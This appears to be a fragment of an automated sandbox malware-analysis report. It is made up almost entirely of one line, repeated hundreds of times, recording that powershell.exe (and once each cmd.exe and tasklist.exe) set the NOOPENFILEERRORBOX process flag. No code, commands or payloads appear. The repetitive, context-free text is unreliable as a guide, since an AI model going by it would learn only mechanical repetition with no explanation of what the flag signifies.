                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
